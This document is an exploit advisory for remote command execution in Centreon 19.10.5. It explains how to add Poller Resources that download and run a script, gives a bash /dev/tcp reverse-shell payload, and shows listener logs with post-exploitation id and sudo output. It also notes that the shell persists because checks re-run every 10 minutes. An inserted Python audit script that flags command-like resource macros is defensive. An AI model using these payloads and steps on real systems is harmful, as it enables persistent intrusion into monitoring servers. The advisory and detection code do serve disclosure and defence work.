# Exploit Title: Centreon 19.10.5 - Remote Command Execution  
# Date: 2020-01-27  
# Exploit Author: Fabien AUNAY, Omri BASO  
# Vendor Homepage: https://www.centreon.com/  
# Software Link: https://github.com/centreon/centreon  
# Version: 19.10.5  
# Tested on: CentOS 7  
# CVE : -  
  
###########################################################################################################  
Centreon 19.10.5 Remote Command Execution Resources  
  
Trusted by SMBs and Fortune 500 companies worldwide.  
An industry reference in IT Infrastructure monitoring for the enterprise.  
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.  
Presence in Toronto and Luxembourg.  
Deployed in diverse sectors:  
- IT & telecommunication  
- Transportation  
- Government  
- Health care  
- Retail  
- Utilities  
- Finance & Insurance  
- Aerospace & Defense  
- Manufacturing  
- etc.  
  
Poller Resources make it possible to call binaries outside the default $USER$ plugin path.  
By adding two resource entries it is possible to trigger a download-and-execute reverse shell.  
Note that the reverse shell is persistent, because Centreon re-executes the payloads every 10 minutes by default.  
  
Steps:  
Objective 1 : Add Download Resource  
Objective 2 : Add Exec Resource  
Objective 3 : Create both check commands  
Objective 4 : Create the services and link them to a host  
  
Restart the Central.  
  
###########################################################################################################  
  
# Objective 1 : Add Download Resource  
- Configuration/Pollers/Resources  
  
- Problem:  
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=  
Illegal Macro Output Characters : `~$^&"|'<>  
Maximum client side input size limit: 35  
  
- Information:  
Read Centreon documentation:  
To install Centreon software from the repository, you should first install the centreon-release package,  
which will provide the repository file. Some may not have the wget package installed.  
If not perform the following : yum install wget  
  
Solution 1: Remove restriction in Configuration/Pollers/Engine configuration  
Solution 2: Modify the client-side input size check in the <input> element: size="250"  
Solution 3: Mixed, use a custom payload -> wget -P /tmp/ 127.0.0.1:8080/x.sh  
  
  
# Objective 2 : Add Exec Resource  
- Configuration/Pollers/Resources  
  
- Problem:  
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=  
Illegal Macro Output Characters : `~$^&"|'<>  
Maximum client side input size limit: 35  
  
Solution: Use a custom payload -> bash /tmp/x.sh  
  
  
# Objective 3 : Create both check commands from your resources ($xxx$), without arguments  
# Objective 4 : Create the services and link them to a host  
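Added audit example, not part of the original advisory: the Python below parses a Nagios-style resource file as exported for Centreon Engine (`$NAME$=value` macros, one per line) and flags every resource whose value is a command line instead of a single plugin directory, which is exactly what the two entries above look like once stored. The sample file content and the allow-list of plugin prefixes are constructed assumptions; adjust both to the local install.

```python
import re
import shlex

# Constructed sample of a Centreon Engine resource.cfg, where the entries from
# Configuration/Pollers/Resources land as $NAME$=value macros. The two
# command-like values mirror the technique described above (constructed data).
SAMPLE_RESOURCE_CFG = """\
$USER1$=/usr/lib/centreon/plugins
$CENTREONPLUGINS$=/usr/lib/centreon/plugins
$DL$=wget -P /tmp/ 127.0.0.1:8080/x.sh
$RUN$=bash /tmp/x.sh
"""

# Assumed allow-list: a healthy poller's resource macros are plugin directories
# under one of these prefixes; adjust to the local install.
ALLOWED_PREFIXES = ("/usr/lib/centreon/plugins", "/usr/lib/nagios/plugins")
MACRO_RE = re.compile(r"^\$(?P<name>[A-Za-z0-9_]+)\$=(?P<value>.*)$")

def parse_resource_cfg(text):
    """Return {name: value} for every $NAME$=value line, ignoring comments."""
    macros = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = MACRO_RE.match(line)
        if m:
            macros[m.group("name")] = m.group("value")
    return macros

def classify(value):
    """Return None for a plain plugin directory, else a short reason string."""
    try:
        tokens = shlex.split(value)  # split the value the way a shell would
    except ValueError:
        return "unbalanced quoting"
    if len(tokens) != 1:
        return "not a single path (%d tokens)" % len(tokens)
    if not tokens[0].startswith(ALLOWED_PREFIXES):
        return "path outside allowed plugin directories"
    return None

def audit(text):
    """Return [(name, value, reason)] for every macro that fails the check."""
    findings = []
    for name, value in parse_resource_cfg(text).items():
        reason = classify(value)
        if reason:
            findings.append((name, value, reason))
    return findings
```

Running `audit()` over the sample flags only `$DL$` and `$RUN$`; the same check can be scheduled against the generated configuration on each poller so that a resource holding a command rather than a path is noticed before the engine's next 10-minute check cycle runs it.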
  
  
POC:  
Payload x.sh : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121  
  
python -m SimpleHTTPServer 8080  
Serving HTTP on 0.0.0.0 port 8080 ...  
127.0.0.1 - - [27/Jan/2020 22:13:27] "GET /x.sh HTTP/1.1" 200 -  
  
  
nc -lvnp 1234  
Ncat: Version 7.50  
Ncat: Listening on :::1234  
Ncat: Listening on 0.0.0.0:1234  
Ncat: Connection from 127.0.0.1.  
Ncat: Connection from 127.0.0.1:43128.  
id  
uid=993(centreon-engine) gid=990(centreon-engine) groups=990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)  
sudo -l  
Matching Defaults entries for centreon-engine on centreon-lab:  
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,  
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",  
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",  
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",  
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",  
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",  
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty  
  
User centreon-engine may run the following commands on centreon-lab:  
(root) NOPASSWD: /sbin/service centreontrapd start  
(root) NOPASSWD: /sbin/service centreontrapd stop  
(root) NOPASSWD: /sbin/service centreontrapd restart  
(root) NOPASSWD: /sbin/service centreontrapd reload  
(root) NOPASSWD: /usr/sbin/service centreontrapd start  
(root) NOPASSWD: /usr/sbin/service centreontrapd stop  
(root) NOPASSWD: /usr/sbin/service centreontrapd restart  
(root) NOPASSWD: /usr/sbin/service centreontrapd reload  
(root) NOPASSWD: /sbin/service centengine start  
(root) NOPASSWD: /sbin/service centengine stop  
(root) NOPASSWD: /sbin/service centengine restart  
(root) NOPASSWD: /sbin/service centengine reload  
(root) NOPASSWD: /usr/sbin/service centengine start  
(root) NOPASSWD: /usr/sbin/service centengine stop  
(root) NOPASSWD: /usr/sbin/service centengine restart  
(root) NOPASSWD: /usr/sbin/service centengine reload  
(root) NOPASSWD: /bin/systemctl start centengine  
(root) NOPASSWD: /bin/systemctl stop centengine  
(root) NOPASSWD: /bin/systemctl restart centengine  
(root) NOPASSWD: /bin/systemctl reload centengine  
(root) NOPASSWD: /usr/bin/systemctl start centengine  
(root) NOPASSWD: /usr/bin/systemctl stop centengine  
(root) NOPASSWD: /usr/bin/systemctl restart centengine  
(root) NOPASSWD: /usr/bin/systemctl reload centengine  
(root) NOPASSWD: /sbin/service cbd start  
(root) NOPASSWD: /sbin/service cbd stop  
(root) NOPASSWD: /sbin/service cbd restart  
(root) NOPASSWD: /sbin/service cbd reload  
(root) NOPASSWD: /usr/sbin/service cbd start  
(root) NOPASSWD: /usr/sbin/service cbd stop  
(root) NOPASSWD: /usr/sbin/service cbd restart  
(root) NOPASSWD: /usr/sbin/service cbd reload  
(root) NOPASSWD: /bin/systemctl start cbd  
(root) NOPASSWD: /bin/systemctl stop cbd  
(root) NOPASSWD: /bin/systemctl restart cbd  
(root) NOPASSWD: /bin/systemctl reload cbd  
(root) NOPASSWD: /usr/bin/systemctl start cbd  
(root) NOPASSWD: /usr/bin/systemctl stop cbd  
(root) NOPASSWD: /usr/bin/systemctl restart cbd  
(root) NOPASSWD: /usr/bin/systemctl reload cbd